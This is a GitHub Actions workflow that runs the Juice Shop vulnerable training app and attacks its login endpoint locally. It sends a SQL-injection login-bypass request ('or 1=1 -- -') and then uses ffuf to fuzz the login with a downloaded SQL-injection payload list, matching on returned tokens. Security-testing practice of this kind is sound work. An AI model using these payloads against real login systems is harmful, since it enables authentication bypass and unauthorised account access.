name: Fuzzing

on:
  workflow_dispatch:
  push:
    branches: [ main ]

permissions:
  contents: write
  pull-requests: write
  security-events: write
  actions: read

jobs:
  ffuf:
    runs-on: ubuntu-latest
    services:
        juice:
          image: bkimminich/juice-shop
          ports:
            - 3000:3000
    steps:
      - name: Wait for service
        run: |
            sleep 10 
            curl --path-as-is -i -s -k -X $'POST' \
              -H $'Host: localhost:3000' -H $'Content-Length: 43' -H $'Content-Type: application/json' -H $'Connection: keep-alive' \
              --data-binary $'{\"email\":\"\' or 1=1 -- -\",\"password\":\"pass\"}' \
              $'http://localhost:3000/rest/user/login'

      - name: Get payloads
        run: |
          wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/SQL-Injection
      
      - name: Install fuzzing
        run: |
          go install github.com/ffuf/ffuf/v2@latest

      - name: Run fuzzing
        run: |
          $HOME/go/bin/ffuf -o ./results.json -of json  -w ./SQL-Injection -u "http://localhost:3000/rest/user/login" -X POST -H "Content-Type: application/json" -d '{"email":"FUZZ","password":"pass"}' -mr \"token\"

      - name: Get Logs from Service
        run: |
          docker logs $(docker ps -q) &> juice-logs.log

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: security-reports-bundle
          path: |
            juice-logs.log
            results.json